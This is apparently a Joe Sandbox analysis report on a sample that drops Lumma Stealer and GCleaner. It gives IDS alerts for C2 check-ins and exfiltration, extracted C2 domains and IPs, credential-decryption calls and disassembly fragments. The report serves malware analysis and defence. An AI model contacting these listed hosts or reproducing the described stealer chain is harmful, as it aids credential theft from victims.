                            2025-03-01T09:49:19.220641+010020287653Unknown Traffic192.168.2.749987176.113.115.96443TCP
                            2025-03-01T09:49:20.562194+010020287653Unknown Traffic192.168.2.749989176.113.115.96443TCP
                            2025-03-01T09:49:21.949261+010020287653Unknown Traffic192.168.2.749990176.113.115.96443TCP
                            2025-03-01T09:49:23.210752+010020287653Unknown Traffic192.168.2.749991176.113.115.96443TCP
                            2025-03-01T09:49:24.635917+010020287653Unknown Traffic192.168.2.749992176.113.115.96443TCP
                            2025-03-01T09:49:26.731943+010020287653Unknown Traffic192.168.2.749993176.113.115.96443TCP
                            2025-03-01T09:49:28.452683+010020287653Unknown Traffic192.168.2.749994176.113.115.96443TCP
                            2025-03-01T09:49:29.910014+010020287653Unknown Traffic192.168.2.749995176.113.115.96443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-01T09:48:38.498433+010020546531A Network Trojan was detected192.168.2.749976104.21.64.1443TCP
                            2025-03-01T09:48:40.424468+010020546531A Network Trojan was detected192.168.2.749977104.21.64.1443TCP
                            2025-03-01T09:49:04.785284+010020546531A Network Trojan was detected192.168.2.749983104.21.64.1443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-01T09:48:38.498433+010020498361A Network Trojan was detected192.168.2.749976104.21.64.1443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-01T09:48:29.740274+010020490381A Network Trojan was detected185.199.108.153443192.168.2.749974TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-01T09:48:37.769859+010020604201Domain Observed Used for C2 Detected192.168.2.7602481.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-01T09:48:48.737395+010020480941Malware Command and Control Activity Detected192.168.2.749978104.21.64.1443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-01T09:49:14.336735+010028032742Potentially Bad Traffic192.168.2.749984176.113.115.96443TCP
                            2025-03-01T09:49:18.298659+010028032742Potentially Bad Traffic192.168.2.749986176.113.115.96443TCP
                            2025-03-01T09:49:19.652546+010028032742Potentially Bad Traffic192.168.2.749987176.113.115.96443TCP
                            2025-03-01T09:49:20.996127+010028032742Potentially Bad Traffic192.168.2.749989176.113.115.96443TCP
                            2025-03-01T09:49:22.380384+010028032742Potentially Bad Traffic192.168.2.749990176.113.115.96443TCP
                            2025-03-01T09:49:23.641265+010028032742Potentially Bad Traffic192.168.2.749991176.113.115.96443TCP
                            2025-03-01T09:49:25.811693+010028032742Potentially Bad Traffic192.168.2.749992176.113.115.96443TCP
                            2025-03-01T09:49:27.171675+010028032742Potentially Bad Traffic192.168.2.749993176.113.115.96443TCP
                            2025-03-01T09:49:28.883149+010028032742Potentially Bad Traffic192.168.2.749994176.113.115.96443TCP
                            2025-03-01T09:49:30.335293+010028032742Potentially Bad Traffic192.168.2.749995176.113.115.96443TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: https://hardswarehub.today/Avira URL Cloud: Label: malware
                            Source: https://hardswarehub.today:443/apiAvira URL Cloud: Label: malware
                            Source: http://185.156.73.73/success?substr=two&s=uniq&sub=nonAvira URL Cloud: Label: malware
                            Source: https://hardswarehub.today/apiLvAvira URL Cloud: Label: malware
                            Source: https://ofice365.github.ioAvira URL Cloud: Label: malware
                            Source: https://hardswarehub.today/apigQPAvira URL Cloud: Label: malware
                            Source: hardswarehub.todayAvira URL Cloud: Label: malware
                            Found malware configuration
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["starrynsightsky.icu", "hardswarehub.today", "tracnquilforest.life", "hardrwarehaven.run", "seizedsentec.online", "codxefusion.top", "quietswtreams.life"], "Build id": "tqqheo--"}
                            Source: 5.2.soft.exe.9f2c000.3.raw.unpackMalware Configuration Extractor: GCleaner {"C2 addresses": ["45.91.200.135", "185.156.73.73"]}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\UNIQ[1].fileReversingLabs: Detection: 18%
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeReversingLabs: Detection: 18%
                            Multi AV Scanner detection for submitted file
                            Source: soft.exeVirustotal: Detection: 26%Perma Link
                            Source: soft.exeReversingLabs: Detection: 26%
                            Joe Sandbox ML detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Sample uses string decryption to hide its real strings
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpackString decryptor: starrynsightsky.icu
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpackString decryptor: hardswarehub.today
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpackString decryptor: tracnquilforest.life
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpackString decryptor: hardrwarehaven.run
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpackString decryptor: seizedsentec.online
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpackString decryptor: codxefusion.top
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpackString decryptor: quietswtreams.life
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0045D230 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,12_2_0045D230
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0045D2E4 ArcFourCrypt,12_2_0045D2E4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0045D2FC ArcFourCrypt,12_2_0045D2FC
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_10001000 ISCryptGetVersion,12_2_10001000
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_10001130 ArcFourCrypt,12_2_10001130
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E30EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,14_2_00007FF7444E30EC
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041BFAA CryptUnprotectData,23_2_0041BFAA

                            Compliance

                            barindex
                            Detected unpacking (overwrites its own PE header)
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeUnpacked PE file: 13.2.ssdtoolbox.exe.400000.0.unpack
                            Source: soft.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SSD ToolBox_is1Jump to behavior
                            Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49973 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.7:49974 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49976 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49977 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49978 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49979 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49980 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49981 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49982 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49983 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.7:49984 version: TLS 1.2
                            Source: soft.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Source: Binary string: msvcp100.i386.pdb source: is-21QH6.tmp.12.dr
                            Source: Binary string: msvcr100.i386.pdb source: is-HP0G4.tmp.12.dr
                            Source: Binary string: wextract.pdb source: MnzBi21FK.exe, 0000000E.00000000.1827835811.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe, 0000000E.00000002.1849429216.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe.9.dr, UNIQ[1].file.9.dr
                            Source: Binary string: wextract.pdbGCTL source: MnzBi21FK.exe, 0000000E.00000000.1827835811.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe, 0000000E.00000002.1849429216.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe.9.dr, UNIQ[1].file.9.dr
                            Source: Binary string: BitLockerToGo.pdb source: soft.exe, 00000005.00000002.1724312184.000000000A004000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: BitLockerToGo.pdbGCTL source: soft.exe, 00000005.00000002.1724312184.000000000A004000.00000004.00001000.00020000.00000000.sdmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00452AD4 FindFirstFileA,GetLastError,12_2_00452AD4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00475798 FindFirstFileA,FindNextFileA,FindClose,12_2_00475798
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,12_2_0046417C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,12_2_004645F8
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose,12_2_00462BF0
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,12_2_00498FDC
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,14_2_00007FF7444E204C

                            Software Vulnerabilities

                            barindex
                            Suspicious execution chain found
                            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl23_2_0041284C
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl23_2_0041284C
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx+15B2AB34h]23_2_0041284C
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+10h]23_2_0044F870
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ecx], dx23_2_0044F870
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], CA198B66h23_2_0044A030
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6D58C181h23_2_00446170
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C0F3A0E1h23_2_0044C1C6
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea ecx, dword ptr [eax+2D321BFEh]23_2_00413183
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-62h]23_2_004312E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx-014B2F66h]23_2_0040FAE9
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], al23_2_00437B25
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl23_2_00437B25
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]23_2_0044FBA0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]23_2_00438C5C
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h23_2_0044E420
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]23_2_0044E550
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ebp, edx23_2_0044E550
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-004F7DAAh]23_2_0044F630
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ecx], dx23_2_0044F630
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov esi, eax23_2_0041BFAA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]23_2_0041B040
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [edx+esi-444800C2h]23_2_00430042
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ebx], al23_2_00439063
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h23_2_0043500F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]23_2_00448032
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h23_2_004470E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80AFh]23_2_004470E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]23_2_004488E3
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-444800C2h]23_2_004308F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h23_2_004308F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], al23_2_004228F8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-1Ah]23_2_0044B88A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp ecx23_2_00434948
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ebp+00h], cx23_2_0042A950
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80A4h]23_2_00421160
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 64DAE379h23_2_00421160
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], CA198B66h23_2_00421160
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esp+000000D0h], 00000000h23_2_0041D91E
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]23_2_0044A980
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]23_2_0044A980
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], al23_2_004381B4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl23_2_004381B4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80AFh]23_2_00447A40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h]23_2_0041D25F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h]23_2_0041C74B
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h23_2_0044EA10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]23_2_0040A220
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]23_2_0040A220
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], al23_2_00422E97
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], al23_2_00422E97
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]23_2_00436AF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movsx esi, byte ptr [ebx+eax]23_2_0044DAF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [edx+esi]23_2_0044DAF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch]23_2_0044DAF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h23_2_0042A2B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edx, dword ptr [ebp-24h]23_2_00433343
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [ebx+edx]23_2_00433343
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [edx]23_2_00443350
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esp+000000D0h], 00000000h23_2_0041D361
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]23_2_00426370
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]23_2_004343D0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then push 00000000h23_2_0043039F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esp+2Ch], ebx23_2_00410C50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl23_2_00439404
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]23_2_00435430
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h23_2_00429CE0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl23_2_00412CEC
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx+15B2AB34h]23_2_00412CEC
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 7A542AABh23_2_0044ED50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebp, word ptr [ecx]23_2_0044ED50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]23_2_0044FD60
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ebx*8], 744E5843h23_2_0044A580
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], cx23_2_00433E60
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp ecx23_2_004346F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h23_2_004346F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6AB32A06h]23_2_004346F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]23_2_0044B6F3
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esp], edx23_2_00422EFA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edx, dword ptr [ebp-24h]23_2_00433680
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [ebx+edx]23_2_00433680
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl23_2_00439E9A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl23_2_00439E9A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx]23_2_0040BEA0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl23_2_00438F44
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl23_2_00438F44
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h]23_2_0041C74B
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movsx esi, byte ptr [ebx+eax]23_2_0044D750
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [edx+esi]23_2_0044D750
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch]23_2_0044D750
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+2Ch]23_2_00431760
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp eax23_2_00431760
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h23_2_00431760
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ecx], dl23_2_0041DF2A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-06E9A8FEh]23_2_004207F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl23_2_00438F82
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl23_2_00438F82
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl23_2_00438F93
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl23_2_00438F93
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch]23_2_0044DF90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, dword ptr [00458390h]23_2_004137A2

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2060420 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (starrynsightsky .icu) : 192.168.2.7:60248 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49977 -> 104.21.64.1:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49976 -> 104.21.64.1:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49976 -> 104.21.64.1:443
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49978 -> 104.21.64.1:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49983 -> 104.21.64.1:443
                            Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.108.153:443 -> 192.168.2.7:49974
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: starrynsightsky.icu
                            Source: Malware configuration extractorURLs: hardswarehub.today
                            Source: Malware configuration extractorURLs: tracnquilforest.life
                            Source: Malware configuration extractorURLs: hardrwarehaven.run
                            Source: Malware configuration extractorURLs: seizedsentec.online
                            Source: Malware configuration extractorURLs: codxefusion.top
                            Source: Malware configuration extractorURLs: quietswtreams.life
                            Source: Malware configuration extractorIPs: 45.91.200.135
                            Source: Malware configuration extractorIPs: 185.156.73.73
                            Source: global trafficTCP traffic: 192.168.2.7:49985 -> 195.154.243.38:2024
